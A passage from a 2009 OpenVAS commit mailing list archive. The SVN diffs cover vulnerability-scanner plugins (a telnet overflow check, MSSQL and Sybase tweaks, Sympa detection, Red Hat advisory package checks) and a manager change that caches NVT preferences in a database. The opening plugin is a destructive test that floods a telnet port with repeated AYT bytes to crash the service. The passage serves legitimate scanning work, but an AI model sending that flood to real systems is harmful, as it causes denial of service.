script_category(ACT_DESTRUCTIVE_ATTACK); + + script_copyright("Copyright (C) 2009 LSS"); + family = "Buffer overflow"; + script_family(family); + script_require_ports("Services/telnet", 23); + exit(0); +} + +##ATTACK## +##Vulnerability tested on AYT commands## +function telnet_attack(port){ + iac_ayt = raw_string(0xff, 0xf6); + bomb_size = 100000; + sock = open_sock_tcp(port); + if(sock){ + bomb = crap(data:iac_ayt, length:2*bomb_size); + send(socket:sock, data:bomb); + close(sock); + return(1); + }else{ + log_message(data:'Can\'t connect to port ' + port); + return(0); + } +} + +##MAIN## +port = get_kb_item("Services/telnet"); +if(!port) port = 23; + +if(telnet_attack(port:port)){ + sock = open_sock_tcp(port); + if(!sock){ + security_hole(port); + }else{ + close(sock); + } +}else exit(-1); + Property changes on: trunk/openvas-plugins/scripts/ms_telnet_overflow.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Modified: trunk/openvas-plugins/scripts/mssql_brute_force.nasl =================================================================== --- trunk/openvas-plugins/scripts/mssql_brute_force.nasl 2009-10-05 13:53:32 UTC (rev 5375) +++ trunk/openvas-plugins/scripts/mssql_brute_force.nasl 2009-10-05 17:43:01 UTC (rev 5376) @@ -48,7 +48,7 @@ family = "Windows"; script_family(family); script_require_ports("Services/mssql", 1433); - script_dependencie("mssqlserver_detect.nasl", "sybase_detect.nasl"); + script_dependencie("mssqlserver_detect.nasl"); exit(0); } @@ -190,7 +190,7 @@ report = ""; port = get_kb_item("Services/mssql"); -if(!port) port = get_kb_item("Services/sybase"); +#if(!port) port = get_kb_item("Services/sybase"); if(!port) port = 1433; Modified: trunk/openvas-plugins/scripts/secpod_ibm_db2_detect_win_900218.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_ibm_db2_detect_win_900218.nasl 2009-10-05 13:53:32 UTC (rev 5375) +++ trunk/openvas-plugins/scripts/secpod_ibm_db2_detect_win_900218.nasl 2009-10-05 17:43:01 UTC (rev 5376) @@ -51,6 +51,10 @@ include("smb_nt.inc"); include("secpod_smb_func.inc"); +if(!get_kb_item("SMB/WindowsVersion")){ + exit(0); +} + key = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\"; foreach item (registry_enum_keys(key:key)) { Modified: trunk/openvas-plugins/scripts/secpod_prochatrooms_dir_trav_n_xss_vuln.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_prochatrooms_dir_trav_n_xss_vuln.nasl 2009-10-05 13:53:32 UTC (rev 5375) +++ trunk/openvas-plugins/scripts/secpod_prochatrooms_dir_trav_n_xss_vuln.nasl 2009-10-05 17:43:01 UTC (rev 5376) @@ -79,6 +79,7 @@ include("version_func.inc"); +include("http_func.inc"); include("http_keepalive.inc"); pcrPort = get_kb_item("Services/www"); Modified: trunk/openvas-plugins/scripts/sybase_blank_password.nasl =================================================================== --- trunk/openvas-plugins/scripts/sybase_blank_password.nasl 2009-10-05 13:53:32 UTC (rev 5375) +++ trunk/openvas-plugins/scripts/sybase_blank_password.nasl 2009-10-05 17:43:01 UTC (rev 5376) @@ -45,7 +45,7 @@ family = "Databases"; script_family(family); script_require_ports("Services/sybase", 5000); - script_dependencies("sybase_detect.nasl"); + script_dependencies("find_service.nes"); exit(0); } @@ -152,8 +152,9 @@ } -port = get_kb_item("Services/sybase"); -if(!port)port = 5000; +#port = get_kb_item("Services/sybase"); +#if(!port)port = 5000; +port = 5000; found = 0; Added: trunk/openvas-plugins/scripts/sympa_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/sympa_detect.nasl 2009-10-05 13:53:32 UTC (rev 5375) +++ trunk/openvas-plugins/scripts/sympa_detect.nasl 2009-10-05 17:43:01 UTC (rev 5376) @@ -0,0 +1,128 @@ +################################################################### +# OpenVAS Network Vulnerability Test +# +# Sympa Detection +# +# LSS-NVT-2009-013 +# +# Developed by LSS Security Team +# +# Copyright (C) 2009 LSS +# +# This program is free software: you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation, either version 2 of +# the License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public +# License along with this program. If not, see +# . +################################################################### + +if(description) +{ + script_id(102013); + script_version("1.1-$Revision$"); + + script_name("Sympa Detection"); + + desc = " +The remote host is running Sympa, an open source (GNU GPL) mailing list management (MLM) software +suite written in Perl. + +See also : + +http://www.sympa.org/ + +Risk factor : None +"; + + script_description(desc); + + script_summary("Detects Sympa"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (C) 2009 LSS"); + script_family("Service detection"); + script_exclude_keys("Settings/disable_cgi_scanning"); + script_require_ports("Services/www", 80, 443); + + exit(0); +} + +include("global_settings.inc"); +include("http_func.inc"); +include("openvas-https.inc"); + + +# Function that checks each dir for Sympa installation +# Optionally can use https + +function CheckSympa(use_https) { + dirs = make_list("/sympa", cgi_dirs()); + + # Go through dirs + foreach dir (dirs) + { + url = string(dir, "/"); + req = http_get(item:url, port:port); + if(use_https==1) + req = https_req_get(request: req, port:port); + else + req = http_send_recv(data: req, port:port); + + if(isnull(req)) return; + + # Check if it is Sympa + pat='Powered by ([^>]*>)?Sympa ?v?([0-9.]+)'; + match=egrep(pattern:pat,string:req, icase:1); + + if(match || egrep(pattern:" Author: mattm Date: 2009-10-05 23:54:23 +0200 (Mon, 05 Oct 2009) New Revision: 5377 Modified: trunk/openvas-manager/ChangeLog trunk/openvas-manager/src/manage.h trunk/openvas-manager/src/omp.c trunk/openvas-manager/src/ompd.c trunk/openvas-manager/src/otp.c trunk/openvas-manager/src/otp.h trunk/openvas-manager/src/tasks_sql.h Log: Move caching of NVT preferences to the database. * src/otp.h (scanner_init_state_t): Add SCANNER_INIT_DONE_CACHE_MODE. * src/ompd.c (init_ompd): In SCANNER_INIT_GOT_PLUGINS set scanner init to special cache done state when in cache mode. Add SCANNER_INIT_DONE_CACHE_MODE to error check. (serve_omp): Add SCANNER_INIT_DONE_CACHE_MODE to select setup. * src/otp.c (current_scanner_preferences, make_scanner_preferences) (add_scanner_preference): Remove. (init_otp_data): Remove scanner.preferences init. (parse_scanner_preference_value): Call manage_nvt_preference_add instead of add_scanner_preference. (process_otp_scanner_input): Add SCANNER_INIT_DONE_CACHE_MODE alongside SCANNER_INIT_DONE. In NVT cache mode, instead of exiting when the NVTs are cached, continue to read the preferences and exit after that. * src/tasks_sql.h (init_manage_process): Also clear NVT prefs. (init_manage): Add outline for database initialisation check. Add table nvt_preferences. (manage_nvt_preference_add, manage_nvt_preferences_enable) (init_nvt_preference_iterator, nvt_preference_iterator_name) (nvt_preference_iterator_value): New functions. * src/manage.h: Add headers. (scanner_t): Remove preferences slot. * src/omp.c (send_preference): Remove. (omp_xml_handle_end_element): In CLIENT_GET_PREFERENCES use new preferences iterator to send preferences. Modified: trunk/openvas-manager/ChangeLog =================================================================== --- trunk/openvas-manager/ChangeLog 2009-10-05 17:43:01 UTC (rev 5376) +++ trunk/openvas-manager/ChangeLog 2009-10-05 21:54:23 UTC (rev 5377) @@ -1,5 +1,39 @@ 2009-10-05 Matthew Mundell + Move caching of NVT preferences to the database. + + * src/otp.h (scanner_init_state_t): Add SCANNER_INIT_DONE_CACHE_MODE. + + * src/ompd.c (init_ompd): In SCANNER_INIT_GOT_PLUGINS set scanner init to + special cache done state when in cache mode. Add + SCANNER_INIT_DONE_CACHE_MODE to error check. + (serve_omp): Add SCANNER_INIT_DONE_CACHE_MODE to select setup. + + * src/otp.c (current_scanner_preferences, make_scanner_preferences) + (add_scanner_preference): Remove. + (init_otp_data): Remove scanner.preferences init. + (parse_scanner_preference_value): Call manage_nvt_preference_add instead + of add_scanner_preference. + (process_otp_scanner_input): Add SCANNER_INIT_DONE_CACHE_MODE alongside + SCANNER_INIT_DONE. In NVT cache mode, instead of exiting when the + NVTs are cached, continue to read the preferences and exit after that. + + * src/tasks_sql.h (init_manage_process): Also clear NVT prefs. + (init_manage): Add outline for database initialisation check. Add table + nvt_preferences. + (manage_nvt_preference_add, manage_nvt_preferences_enable) + (init_nvt_preference_iterator, nvt_preference_iterator_name) + (nvt_preference_iterator_value): New functions. + + * src/manage.h: Add headers. + (scanner_t): Remove preferences slot. + + * src/omp.c (send_preference): Remove. + (omp_xml_handle_end_element): In CLIENT_GET_PREFERENCES use new + preferences iterator to send preferences. + +2009-10-05 Matthew Mundell + * src/ompd.c (recreate_session): Add openvas_server_free to fnctl fail. (serve_omp): Put the credential args the right way round. Modified: trunk/openvas-manager/src/manage.h =================================================================== --- trunk/openvas-manager/src/manage.h 2009-10-05 17:43:01 UTC (rev 5376) +++ trunk/openvas-manager/src/manage.h 2009-10-05 21:54:23 UTC (rev 5377) @@ -41,7 +41,6 @@ certificates_t* certificates; ///< List of certificates. char* plugins_md5; ///< MD5 sum over all tests. GHashTable* plugins_dependencies; ///< Dependencies between plugins. - GHashTable* preferences; ///< Scanner preference. GPtrArray* rules; ///< Scanner rules. int rules_size; ///< Number of rules. } scanner_t; @@ -635,8 +634,26 @@ nvt_selector_nvt_count (const char*, const char*); -/* Lsc_Credentials. */ +/* NVT preferences. */ +void +manage_nvt_preference_add (char*, char*); + +void +manage_nvt_preferences_enable (); + +void +init_nvt_preference_iterator (iterator_t*); + +const char* +nvt_preference_iterator_name (iterator_t*); + +const char* +nvt_preference_iterator_value (iterator_t*); + + +/* LSC credentials. */ + int create_lsc_credential (const char*, const char*); Modified: trunk/openvas-manager/src/omp.c =================================================================== --- trunk/openvas-manager/src/omp.c 2009-10-05 17:43:01 UTC (rev 5376) +++ trunk/openvas-manager/src/omp.c 2009-10-05 21:54:23 UTC (rev 5377) @@ -1690,38 +1690,6 @@ } /** - * @brief Send XML for a preference. - * - * @param[in] key The preferences hashtable key. - * @param[in] value The preferences hashtable value. - * @param[in] dummy Dummy variable for g_hash_table_find. - * - * @return TRUE if out of space in to_client buffer, else FALSE. - */ -static gboolean -send_preference (gpointer key, gpointer value, /*@unused@*/ gpointer dummy) -{ - /* \todo Do these reallocations affect performance? */ - gchar* key_text = g_markup_escape_text ((char*) key, - strlen ((char*) key)); - gchar* value_text = g_markup_escape_text ((char*) value, - strlen ((char*) value)); - gchar* msg = g_strdup_printf ("" - "%s%s" - "", - key_text, value_text); - g_free (key_text); - g_free (value_text); - if (send_to_client (msg)) - { - g_free (msg); - return TRUE; - } - g_free (msg); - return FALSE; -} - -/** * @brief Send XML for a rule. * * @param[in] rule The rule. @@ -2550,22 +2518,26 @@ break; case CLIENT_GET_PREFERENCES: - if (scanner.preferences) - { - SEND_TO_CLIENT_OR_FAIL (""); - if (g_hash_table_find (scanner.preferences, send_preference, NULL)) - { - error_send_to_client (error); - return; - } - SEND_TO_CLIENT_OR_FAIL (""); - } - else - SEND_TO_CLIENT_OR_FAIL (XML_SERVICE_DOWN ("get_preferences")); - set_client_state (CLIENT_AUTHENTIC); - break; + { + iterator_t prefs; + SEND_TO_CLIENT_OR_FAIL (""); + init_nvt_preference_iterator (&prefs); + while (next (&prefs)) + { + SENDF_TO_CLIENT_OR_FAIL ("" + "%s" + "%s" + "", + nvt_preference_iterator_name (&prefs), + nvt_preference_iterator_value (&prefs)); + } + cleanup_iterator (&prefs); + SEND_TO_CLIENT_OR_FAIL (""); + set_client_state (CLIENT_AUTHENTIC); + break; + } case CLIENT_GET_CERTIFICATES: if (scanner.certificates) @@ -5203,7 +5175,8 @@ * * @param[in] log_config Logging configuration list. * - * @return 0 success, -1 error, -2 database is wrong version. + * @return 0 success, -1 error, -2 database is wrong version, -3 database + * needs to be initialized from server. */ int init_omp (GSList *log_config) Modified: trunk/openvas-manager/src/ompd.c =================================================================== --- trunk/openvas-manager/src/ompd.c 2009-10-05 17:43:01 UTC (rev 5376) +++ trunk/openvas-manager/src/ompd.c 2009-10-05 21:54:23 UTC (rev 5377) @@ -95,7 +95,8 @@ * * @param[in] log_config Log configuration * - * @return 0 success, -1 error, -2 database is wrong version. + * @return 0 success, -1 error, -2 database is wrong version, -3 database + * needs to be initialized from server. */ int init_ompd (GSList *log_config) @@ -385,7 +386,12 @@ (scanner_session, ack + scanner_init_offset); if (scanner_init_offset == 0) - set_scanner_init_state (SCANNER_INIT_DONE); + { + if (ompd_nvt_cache_mode) + set_scanner_init_state (SCANNER_INIT_DONE_CACHE_MODE); + else + set_scanner_init_state (SCANNER_INIT_DONE); + } else if (scanner_init_offset == -1) { scanner_init_offset = 0; @@ -396,6 +402,7 @@ } /*@fallthrough@*/ case SCANNER_INIT_DONE: + case SCANNER_INIT_DONE_CACHE_MODE: while (1) switch (write_to_server_buffer (scanner_session)) { @@ -675,6 +682,7 @@ } if ((scanner_init_state == SCANNER_INIT_DONE + || scanner_init_state == SCANNER_INIT_DONE_CACHE_MODE || scanner_init_state == SCANNER_INIT_GOT_VERSION || scanner_init_state == SCANNER_INIT_SENT_COMPLETE_LIST || scanner_init_state == SCANNER_INIT_SENT_PASSWORD @@ -687,7 +695,8 @@ } if (((scanner_init_state == SCANNER_INIT_TOP - || scanner_init_state == SCANNER_INIT_DONE) + || scanner_init_state == SCANNER_INIT_DONE + || scanner_init_state == SCANNER_INIT_DONE_CACHE_MODE) && to_server_buffer_space () > 0) || scanner_init_state == SCANNER_INIT_CONNECT_INTR || scanner_init_state == SCANNER_INIT_CONNECTED Modified: trunk/openvas-manager/src/otp.c =================================================================== --- trunk/openvas-manager/src/otp.c 2009-10-05 17:43:01 UTC (rev 5376) +++ trunk/openvas-manager/src/otp.c 2009-10-05 21:54:23 UTC (rev 5377) @@ -417,40 +417,6 @@ /*@null@*/ /*@only@*/ static char* current_scanner_preference = NULL; -/** - * @brief The current scanner preferences, during reading of scanner preferences. - */ -static GHashTable* current_scanner_preferences = NULL; - -/** - * @brief Create the scanner preferences. - */ -static GHashTable* -make_scanner_preferences () -{ - return g_hash_table_new_full (g_str_hash, - g_str_equal, - g_free, - g_free); -} - -/** - * @brief Add a preference to the scanner preferences. - * - * Both parameters are used directly, and are freed when the - * preferences are freed. - * - * @param[in] preference The preference. - * @param[in] value The value of the preference. - */ -static void -add_scanner_preference (GHashTable* preferences, - /*@keep@*/ char* preference, - /*@keep@*/ char* value) -{ - g_hash_table_insert (preferences, preference, value); -} - /* Scanner plugins. */ @@ -616,7 +582,6 @@ init_otp_data () { scanner.certificates = NULL; - scanner.preferences = NULL; scanner.rules = NULL; scanner.plugins_md5 = NULL; } @@ -1016,9 +981,7 @@ { match[0] = '\0'; value = g_strdup (*messages); - add_scanner_preference (current_scanner_preferences, - current_scanner_preference, - value); + manage_nvt_preference_add (current_scanner_preference, value); set_scanner_state (SCANNER_PREFERENCE_NAME); from_scanner_start += match + 1 - *messages; *messages = match + 1; @@ -1251,7 +1214,7 @@ * * This includes updating the scanner state with \ref set_scanner_state * and \ref set_scanner_init_state, and updating scanner records with functions - * like \ref add_scanner_preference and \ref append_task_open_port. + * like \ref manage_nvt_preference_add and \ref append_task_open_port. * * \endif * @@ -1373,6 +1336,7 @@ case SCANNER_INIT_SENT_COMPLETE_LIST: case SCANNER_INIT_SENT_PASSWORD: case SCANNER_INIT_DONE: + case SCANNER_INIT_DONE_CACHE_MODE: case SCANNER_INIT_TOP: if (scanner_state == SCANNER_TOP) switch (parse_scanner_bad_login (&messages)) @@ -1968,13 +1932,7 @@ if (scanner_init_state == SCANNER_INIT_SENT_COMPLETE_LIST) { set_scanner_init_state (SCANNER_INIT_GOT_PLUGINS); - /* Initialisation only sends COMPLETE_LIST when - * caching plugins, so return 1 (as though the - * scanner sent BYE). */ - // FIX should perhaps exit more formally with - // scanner set_nvts_md5sum (scanner.plugins_md5); - return 1; } break; case -1: return -1; @@ -2142,10 +2100,15 @@ if (sync_buffer ()) return -1; return 0; } - if (scanner.preferences) - g_hash_table_destroy (scanner.preferences); - scanner.preferences = current_scanner_preferences; - current_scanner_preferences = NULL; + if (scanner_init_state == SCANNER_INIT_DONE_CACHE_MODE) + { + set_scanner_init_state (SCANNER_INIT_DONE); + manage_nvt_preferences_enable (); + /* Return 1, as though the scanner sent BYE. */ + // FIX should perhaps exit more formally with scanner + scanner_active = 0; + return 1; + } break; } { @@ -2216,7 +2179,6 @@ else if (strcasecmp ("PREFERENCES", field) == 0) { assert (current_scanner_preference == NULL); - current_scanner_preferences = make_scanner_preferences (); set_scanner_state (SCANNER_PREFERENCE_NAME); } else if (strcasecmp ("RULES", field) == 0) Modified: trunk/openvas-manager/src/otp.h =================================================================== --- trunk/openvas-manager/src/otp.h 2009-10-05 17:43:01 UTC (rev 5376) +++ trunk/openvas-manager/src/otp.h 2009-10-05 21:54:23 UTC (rev 5377) @@ -44,6 +44,7 @@ SCANNER_INIT_CONNECT_INTR, /* `connect' to scanner was interrupted. */ SCANNER_INIT_CONNECTED, SCANNER_INIT_DONE, + SCANNER_INIT_DONE_CACHE_MODE, /* Done state when in NVT caching mode. */ SCANNER_INIT_GOT_MD5SUM, SCANNER_INIT_GOT_PASSWORD, SCANNER_INIT_GOT_PLUGINS, Modified: trunk/openvas-manager/src/tasks_sql.h =================================================================== --- trunk/openvas-manager/src/tasks_sql.h 2009-10-05 17:43:01 UTC (rev 5376) +++ trunk/openvas-manager/src/tasks_sql.h 2009-10-05 21:54:23 UTC (rev 5377) @@ -715,6 +715,7 @@ { sql ("BEGIN EXCLUSIVE;"); sql ("DELETE FROM nvts;"); + sql ("DELETE FROM nvt_preferences;"); sql ("DELETE FROM meta WHERE name = 'nvts_checksum';"); sql ("COMMIT;"); } @@ -746,6 +747,7 @@ { sql ("BEGIN EXCLUSIVE;"); sql ("DELETE FROM nvts;"); + sql ("DELETE FROM nvt_preferences;"); sql ("DELETE FROM meta WHERE name = 'nvts_checksum';"); sql ("COMMIT;"); } @@ -887,7 +889,8 @@ * Beware that calling this function while tasks are running may lead to * problems. * - * @return 0 success, -1 error, -2 database is wrong version. + * @return 0 success, -1 error, -2 database is wrong version, -3 database needs + * to be initialised from server. */ int init_manage (GSList *log_config) @@ -912,6 +915,22 @@ && strcmp (database_version, G_STRINGIFY (DATABASE_VERSION))) return -2; +#if 0 + /** @todo Skip this when in NVT caching mode. */ + + /* Check that the database was initialised from the scanner. */ + + { + long long int count; + if (sql_int64 (&count, 0, 0, + "SELECT count(*) FROM meta" + " WHERE name = 'nvt_md5sum'" + " OR name = 'nvt_preferences_enabled';") + || count < 2) + return -3; + } +#endif + /* Ensure the tables exist. */ sql ("CREATE TABLE IF NOT EXISTS meta (name UNIQUE, value);"); @@ -927,6 +946,7 @@ sql ("CREATE TABLE IF NOT EXISTS report_hosts (report INTEGER, host, start_time, end_time, attack_state, current_port, max_port);"); sql ("CREATE TABLE IF NOT EXISTS report_results (report INTEGER, result INTEGER);"); sql ("CREATE TABLE IF NOT EXISTS nvts (oid, version, name, summary, description, copyright, cve, bid, xref, tag, sign_key_ids, category, family);"); + sql ("CREATE TABLE IF NOT EXISTS nvt_preferences (name, value);"); sql ("CREATE TABLE IF NOT EXISTS lsc_credentials (name, comment, rpm, deb, dog);"); /* Ensure the version is set. */ @@ -4432,6 +4452,54 @@ } +/* NVT preferences. */ + +/** + * @brief Add an NVT preference. + * + * @param[in] name The name of the preference. + * @param[in] value The value of the preference. + */ +void +manage_nvt_preference_add (char* name, char* value) +{ + gchar* quoted_name = sql_quote (name); + gchar* quoted_value = sql_quote (value); + sql ("INSERT into nvt_preferences (name, value)" + " VALUES ('%s', '%s');", + quoted_name, quoted_value); + g_free (quoted_name); + g_free (quoted_value); +} + +/** + * @brief Add an NVT preference. + * + * @param[in] name The name of the preference. + * @param[in] value The value of the preference. + */ +void +manage_nvt_preferences_enable () +{ + sql ("INSERT OR REPLACE INTO meta (name, value)" + " VALUES ('nvt_preferences_enabled', 1);"); +} + +/** + * @brief Initialise an NVT preference iterator. + * + * @param[in] iterator Iterator. + */ +void +init_nvt_preference_iterator (iterator_t* iterator) +{ + init_table_iterator (iterator, "nvt_preferences"); +} + +DEF_ACCESS (nvt_preference_iterator_name, 0); +DEF_ACCESS (nvt_preference_iterator_value, 1); + + /* LSC Credentials. */ /** From scm-commit at wald.intevation.org Tue Oct 6 02:49:43 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 02:49:43 +0200 (CEST) Subject: [Openvas-commits] r5378 - in trunk/openvas-plugins: . scripts Message-ID: <20091006004943.4537D852B6F9@pyrosoma.intevation.org> Author: reinke Date: 2009-10-06 02:49:40 +0200 (Tue, 06 Oct 2009) New Revision: 5378 Added: trunk/openvas-plugins/scripts/RHSA_2009_1455.nasl trunk/openvas-plugins/scripts/RHSA_2009_1465.nasl trunk/openvas-plugins/scripts/RHSA_2009_1470.nasl trunk/openvas-plugins/scripts/RHSA_2009_1471.nasl trunk/openvas-plugins/scripts/RHSA_2009_1472.nasl trunk/openvas-plugins/scripts/deb_1896_1.nasl trunk/openvas-plugins/scripts/deb_1897_1.nasl trunk/openvas-plugins/scripts/deb_1898_1.nasl trunk/openvas-plugins/scripts/deb_1899_1.nasl trunk/openvas-plugins/scripts/deb_1900_1.nasl trunk/openvas-plugins/scripts/deb_1901_1.nasl trunk/openvas-plugins/scripts/fcore_2009_10165.nasl trunk/openvas-plugins/scripts/fcore_2009_10172.nasl trunk/openvas-plugins/scripts/fcore_2009_10180.nasl trunk/openvas-plugins/scripts/freebsd_mybb.nasl trunk/openvas-plugins/scripts/freebsdsa_devfs1.nasl trunk/openvas-plugins/scripts/freebsdsa_pipe1.nasl trunk/openvas-plugins/scripts/mdksa_2009_249.nasl trunk/openvas-plugins/scripts/mdksa_2009_253.nasl trunk/openvas-plugins/scripts/mdksa_2009_254.nasl trunk/openvas-plugins/scripts/mdksa_2009_255.nasl trunk/openvas-plugins/scripts/ubuntu_838_1.nasl trunk/openvas-plugins/scripts/ubuntu_839_1.nasl Modified: trunk/openvas-plugins/ChangeLog Log: New scripts added Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/ChangeLog 2009-10-06 00:49:40 UTC (rev 5378) @@ -1,3 +1,31 @@ +2009-10-05 Thomas Reinke + + *scripts/deb_1896_1.nasl, + scripts/deb_1897_1.nasl, + scripts/deb_1898_1.nasl, + scripts/deb_1899_1.nasl, + scripts/deb_1900_1.nasl, + scripts/deb_1901_1.nasl, + scripts/freebsd_mybb.nasl, + scripts/freebsdsa_devfs1.nasl, + scripts/freebsdsa_pipe1.nasl, + scripts/ubuntu_838_1.nasl, + scripts/ubuntu_839_1.nasl, + scripts/mdksa_2009_249.nasl, + scripts/mdksa_2009_253.nasl, + scripts/mdksa_2009_254.nasl, + scripts/mdksa_2009_255.nasl, + scripts/RHSA_2009_1455.nasl, + scripts/RHSA_2009_1465.nasl, + scripts/RHSA_2009_1470.nasl, + scripts/RHSA_2009_1471.nasl, + scripts/RHSA_2009_1472.nasl, + scripts/fcore_2009_10165.nasl, + scripts/fcore_2009_10172.nasl, + scripts/fcore_2009_10180.nasl: + New plugins. + + 2009-10-05 Michael Meyer * scripts/cvspserver_version.nasl, Added: trunk/openvas-plugins/scripts/RHSA_2009_1455.nasl =================================================================== --- trunk/openvas-plugins/scripts/RHSA_2009_1455.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/RHSA_2009_1455.nasl 2009-10-06 00:49:40 UTC (rev 5378) @@ -0,0 +1,142 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory RHSA-2009:1455 () +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(64991); + script_cve_id("CVE-2009-2849"); + script_version ("$"); + script_name("RedHat Security Advisory RHSA-2009:1455"); + + desc = " +The remote host is missing updates to the kernel announced in +advisory RHSA-2009:1455. + +Security fix: + +* a NULL pointer dereference flaw was found in the Multiple Devices (md) +driver in the Linux kernel. If the suspend_lo or suspend_hi file on the +sysfs file system (/sys/) is modified when the disk array is inactive, it +could lead to a local denial of service or privilege escalation. Note: By +default, only the root user can write to the files mentioned above. +(CVE-2009-2849, Moderate) + +For details on other bug fixes applied to this update, please visit +the referenced security advisories. + +Users should upgrade to these updated packages, which contain backported +patches to correct these issues. The system must be rebooted for this +update to take effect. + +Solution: +Please note that this update is available via +Red Hat Network. To use Red Hat Network, launch the Red +Hat Update Agent with the following command: up2date + +http://rhn.redhat.com/errata/RHSA-2009-1455.html +http://www.redhat.com/security/updates/classification/#moderate + +Risk factor : Medium"; + + script_description(desc); + + script_summary("Redhat Security Advisory RHSA-2009:1455"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com"); + script_family("Red Hat Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/rpms"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-rpm.inc"); +vuln = 0; +if(isrpmvuln(pkg:"kernel", rpm:"kernel~2.6.18~164.2.1.el5", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-PAE", rpm:"kernel-PAE~2.6.18~164.2.1.el5", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-PAE-debuginfo", rpm:"kernel-PAE-debuginfo~2.6.18~164.2.1.el5", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-PAE-devel", rpm:"kernel-PAE-devel~2.6.18~164.2.1.el5", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-debug", rpm:"kernel-debug~2.6.18~164.2.1.el5", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-debug-debuginfo", rpm:"kernel-debug-debuginfo~2.6.18~164.2.1.el5", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-debug-devel", rpm:"kernel-debug-devel~2.6.18~164.2.1.el5", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-debuginfo", rpm:"kernel-debuginfo~2.6.18~164.2.1.el5", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-debuginfo-common", rpm:"kernel-debuginfo-common~2.6.18~164.2.1.el5", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-devel", rpm:"kernel-devel~2.6.18~164.2.1.el5", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-headers", rpm:"kernel-headers~2.6.18~164.2.1.el5", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-xen", rpm:"kernel-xen~2.6.18~164.2.1.el5", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-xen-debuginfo", rpm:"kernel-xen-debuginfo~2.6.18~164.2.1.el5", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-xen-devel", rpm:"kernel-xen-devel~2.6.18~164.2.1.el5", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-doc", rpm:"kernel-doc~2.6.18~164.2.1.el5", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-kdump", rpm:"kernel-kdump~2.6.18~164.2.1.el5", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-kdump-debuginfo", rpm:"kernel-kdump-debuginfo~2.6.18~164.2.1.el5", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-kdump-devel", rpm:"kernel-kdump-devel~2.6.18~164.2.1.el5", rls:"RHENT_5")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/RHSA_2009_1465.nasl =================================================================== --- trunk/openvas-plugins/scripts/RHSA_2009_1465.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/RHSA_2009_1465.nasl 2009-10-06 00:49:40 UTC (rev 5378) @@ -0,0 +1,100 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory RHSA-2009:1465 () +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(64990); + script_cve_id("CVE-2009-3290"); + 